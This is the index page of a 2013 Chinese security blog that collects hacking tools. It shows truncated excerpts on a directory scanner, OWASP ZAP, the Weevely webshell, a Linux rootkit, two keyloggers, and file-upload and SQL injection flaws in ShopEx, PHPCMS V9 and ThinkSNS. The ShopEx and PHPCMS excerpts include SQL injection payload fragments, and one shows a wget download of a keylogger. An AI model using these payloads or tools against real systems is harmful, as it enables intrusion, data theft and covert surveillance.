本博客只做技术文章、工具的收藏!

feed订阅 新浪微博 你好,欢迎光临! 

php curl 实现的并发目录扫描

2013.02.16 , , 1 Comment ,

用法跟wwwscan 基本一样 支持linux 参数输入风格 如 -p 等同 --port html方式输出 扫描结果 支持自定义字典 利用 php curl函数 模拟 多线程 扫描 更人性化 无需输入所有参数 默认 定义了相关参数(字典:cig.list 默认线程: 5) 对url处理更人性化 如扫描 www.baidu.com 可输入: http://www.ba...

Web渗透测试框架-Zed Attack Proxy v 2.0.0(OWASP出品)

2013.02.16 , , No Comments ,

OWASP出品的Zed Attack Proxy (ZAP)是一款集成各种工具的渗透测试框架,可以发现在WEB应用程序中的漏洞。   官方网站:https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project 增加了很多新功能,更新: http://owasp.blogspot.com/2013/0...

隐蔽可扩展PHP Webshell – Weevely 1.0

2013.02.8 , , No Comments ,

Weevely是一款隐蔽模块化的PHP WEBSHELL,Weevely基于c/s模式构建,目前已经有30多个模块,功能涉及服务器错误配置审计,后门放置,暴+力破解,文件管理,资源搜索,网络代理,命令执行,数据库操作,系统信息收集及端口扫描等。 运行Weevely 1.0需要python2.7,笔者在win7+python2.7下测试通过。首先下载setuptools...

Linux Rootkit suterusu

2013.02.4 , , No Comments ,

前言 最早Rootkit用于善意用途,但后来Rootkit也被骇客用在入侵和攻击他人的电脑系统上,电脑病毒、间谍软件等也常使用Rootkit来隐藏踪迹,因此Rootkit已被大多数的防毒软件归类为具危害性的恶意软件。Linux、Windows、Mac OS等操作系统都有机会成为Rootkit的受害目标。 Rootkit出现于二十世纪90年代初,在1994年2月的一篇安...

Linux/unix 键盘记录 ixkeylog

2013.02.4 , , No Comments ,

ixkeylog是Linux/unix的一个键盘记录工具,支持Linux 2.6.x NetBSD FreeBSD OpenBSD 源代码可以在这里找到:点击下载 编译参数 Linux 2.6.x $ gmake -f Makefile.Linux ixkeylog $ ldd ./ixkeylog ...

Linux键盘记录sh2log keylogger notes

2013.02.4 , , No Comments ,

不仅可以记录到击键信息,而且包括终端下的输出信息 [root@Centos log]# wget http://www.i0day.com//exp/Linux/sh2log-1.0.tgz --2013-01-07 05:16:56-- http://www.i0day.com//exp/Linux/sh2log-1.0.tgz Resolving packetst...

新年礼物:shopex通杀注入两处

2013.02.4 , , No Comments ,

http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html http://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/b...

PHPCMS_V9注入0DAY___EXP已构造

2013.02.2 , , 1 Comment ,

PHPCMS_V9注入0DAY___EXP 漏洞来源:土司:https://www.t00ls.net/thread-21894-1-1.html EXP构造:haxsscker 土司只给了张烂图- -没给语句……那我就自己构造吧…… 本人构造结果如下: %60userid%60%3D%28select+1+from%28select+count%28%2A%29...

Thinksns 2.8 文件上传漏洞分析&完美利用

2013.01.31 , , 1 Comment ,

一. Thinksns简介 ThinkSNS(简称TS),是智士软件开源的开源微博、社交网络平台。采用PHP+MySQL技术平台,微博+应用的产品模式,通过应用、插件、风格包等丰富的机制来扩展功能,同时支持多种常见浏览器和移动客户端。拥有iphone、android客户端以及适合手机浏览的wap版界面,是建立社交网站、微博平台、移动互联网创业的首选二次开发平台。 Th...

手机中的Backtrack—移动渗透测试套件Revenssis

2013.01.31 , , No Comments ,

Revenssis是一款智能手机平台上的渗透测试套件,被称为“手机中的Backtrack”。 在它提供的工具包括:Web应用程序扫描器,编码/解码和hash破解工具,漏洞研究实验室以及一些其他渗透测试常用的功能,如shell,SSH,DNS / WHOIS查询,路由跟踪,端口扫描,垃圾邮件数据库查找,NETSTAT 等。 特性: SQL注入检测 XSS检测 DDOS...